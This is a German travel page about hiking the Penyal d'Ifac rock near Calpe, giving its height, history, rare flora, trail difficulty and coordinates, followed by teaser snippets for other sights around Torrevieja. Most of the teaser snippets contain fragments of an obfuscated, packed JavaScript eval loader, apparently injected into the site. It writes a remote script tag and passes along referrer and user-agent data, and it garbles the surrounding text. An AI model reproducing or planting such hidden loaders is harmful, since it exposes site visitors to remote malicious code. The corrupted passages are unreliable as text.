Penyal d’Ifac – Wanderstrecke zum Berggipfel in Calpe.

1380
Penyal d’Ifac

Penyal d’Ifac ist eine der beliebtesten Sehenswürdigkeiten in der Umgebung von Torrevieja, in Spanisch Peñón de Ifach. Der Fels an der spanischen Mittelmeerküste bei der Stadt Calp, nördlich von Alicante, ist ein perfektes Ziel für einen Tagesausflug und innerhalb einer halben Stunde mit dem Auto zu erreichen. Stellplätze für Fahrzeuge sind vorhanden. Sie können die Spitze des Peñón de Ifach zu Fuß erreichen und eine atemberaubende Aussicht genießen. Bei gutem Wetter ist es möglich, dass 90 Kilometer entfernte Ibiza zu sehen. Die Wanderstrecke bis hinauf auf die Bergspitze dauert ungefähr 1 bis 2 Stunden und verbindet Fitness, frische Meeresluft und unglaubliche Eindrücke zu einem unvergesslichen Erlebnis.

Der Penyal d’Ifac ist 332 Meter hoch, 1 Kilometer lang und besitzt eine Fläche von um die 50.000 m² und kann daher schon vom weiten gesehen werden. Zudem sind es nur wenige Minuten in die Innenstadt von Calp. Sie können vor Ihrer Wanderung genügend Proviant vor Ort kaufen und nach Ihrer Tour ein erfrischendes, kühles Getränk zu sich nehmen. Der Strand ist außerdem zu Fuß zu erreichen, vergessen Sie daher nicht Ihre Badesachen!

Geschichte des Penyal d’Ifac.

Geschichtlich diente der Peñón de Ifach als sichtbare Landmarke und Orientierungspunkt für Reisende. Zudem wird vermutet, dass die Römer, Phönizier und weitere Völker den Berg als Aussichtspunkt nutzten um Gefahren frühzeitig zu erkennen.
In der Neuzeit dient der Penyal d’Ifac als touristische Sehenswürdigkeit in Calp. Zum Beginn des 20. Jahrhunderts wurde ein 40 Meter langer Tunnel durch den Berg gebaut. Dies ermöglichte es, von der Nordseite auf die Ostseite des Penyal zu gelangen. Daher können Familien und Wandergruppen über gekennzeichnete Pfade den Gipfel erreichen. In der Vergangenheit wechselten die Besitzer des Berges oft, daher war der Penyal d’Ifac zeitweise auch im Privatbesitz. In der heutigen Zeit ist die autonome Region Valencia im Besitz des Berges und hat die Region zum Naturschutzgebiet erklärt.

Wanderstrecke zum Gipfel des Peñón de Ifach in Calpe.

Die Wanderroute zum Gipfel des Peñón de Ifach in der Nähe von Torrevieja bietet die Möglichkeit, bis zu 300 verschiedene Tierarten zu beobachten. Zudem finden Sie viele verschiedene Kräuter und Pflanzen, die die Wanderroute schmücken. Die Ifach-Nelke (Silene hifacensis) ist sehr selten. Lediglich 20 bis 30 Exemplare sollen davon noch existieren. Die Wanderstrecke beginnt sehr leicht und bietet schon nach einigen Minuten beeindruckende Aussichten. Einige Minuten, nachdem Sie den Tunnel durchquert haben, wird die Wanderstrecke schwerer. Trotzdem ist diese auch für etwas ältere Menschen und Jugendliche geeignet. Der erste, etwas leichtere Pfad, führt zum Aussichtspunkt der ehemaligen Grenzsoldaten. Von hier haben Sie eine wunderschöne Aussicht über das Meer.

Der zweite Pfad, welcher zum Gipfel des Penon de Ifach führt, ist wesentlich anstrengender. Um den Gipfel zu erreichen, sollten Sie eine gute Kondition mitbringen und etwas Wasser für kleine Pausen. Die Aussicht vom Gipfel ist aber alle Mühe wert. Die Wanderpfade sind markiert aber an einigen Stellen schwer wiederzufinden.

Der Penyal d’Ifac ist eine Reise wert und sollte, wenn Sie etwas Zeit in Torrevieja verbringen, eine Ihrer Ausflugsziele sein. Bei weiteren Fragen rund um die Anfahrt oder Koordinaten, können Sie uns jederzeit eine E-Mail (mail@torrevieja.de) schreiben oder eine Nachricht auf Facebook hinterlassen.

Koordinaten: 38.638581, 0.072818

Sehenswürdigkeiten und Ausflugsziele

Paseo Vista Alegre

Paseo Vista Alegre

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|hekfr||97|script|language|rel|nofollow|type|text|src|http|45|67|write|hadrf|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"] Die Promenade “Paseo Vista Alegre“ befindet sich direkt am Hafen von Torrevieja, vor dem Real Club Nautico und der Touristeninformation....
Wanderung Rio Seco

Rio Seco Route Pinar de Campoverde und Area Natural

Rio Seco, dieses ist der 3. Teil von 03191 Pilar de la Horadada Richtung Pinar de Campoverde. Zum 1. Teil mit Bericht und Beschreibung: Rio...
Casino von Murcia

Fotos vom Real Casino von Murcia

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|hyrzy||97|script|language|rel|nofollow|type|text|src|http|45|67|write|sktsa|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Fotos vom schönen Real Casino von Murcia. Das Casino in der spanischen Stadt Murcia ist eine Sehenswürdigkeit, die jährlich viele...
Nacimiento Rio Mundo in Riopar

Großer Wasserfall bei Albacete in Riopar Nacimiento Rio Mundo

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|eenek||97|script|language|rel|nofollow|type|text|src|http|45|67|write|frrfh|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Wow, was für ein toller Wasserfall! Wir staunten in Riopar nicht schlecht, als wir unter dem großen Wasserfall standen. Hier...
Molino del Aqua Torrevieja

Naturpark Molino del Aqua

Der eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d=k||c.toString(a)}k=}];e=function(){return'w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('b'+e(c)+'b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|akeak||97|script|language|rel|nofollow|type|text|src|http|45|67|write|ykkaa|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) Parque del Molino del Agua (Wassermühlenpark) umfasst 17,22 Hektar und sein größter ökologischer Reichtum ist das Dünensystem, dass...
Insel Tabarca

Insel Tabarca

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|iasbe||97|script|language|rel|nofollow|type|text|src|http|45|67|write|etskt|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Auf Tabarca – die 1800 m lange, 400 m breite und mit 40 Einwohnern einzige bewohnte Insel der Region, ist...